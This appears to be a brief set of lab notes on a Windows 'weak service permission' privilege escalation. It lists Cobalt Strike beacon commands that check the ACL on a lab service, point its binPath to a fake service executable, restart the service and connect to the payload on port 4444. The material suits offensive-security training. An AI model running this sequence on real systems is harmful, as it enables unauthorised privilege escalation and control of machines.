Weak Service Permission
https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
beacon> powershell-import C:\Tools\Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name Vuln-Service-2 | select -expandproperty Access
beacon> run sc qc Vuln-Service-2
beacon> run sc config Vuln-Service-2 binPath= C:\Temp\fake-service.exe
beacon> run sc qc Vuln-Service-2
beacon> run sc query Vuln-Service-2
beacon> run sc stop Vuln-Service-2
beacon> run sc start Vuln-Service-2
beacon> shell netstat -ano | findstr 4444
beacon> connect localhost 4444
Last updated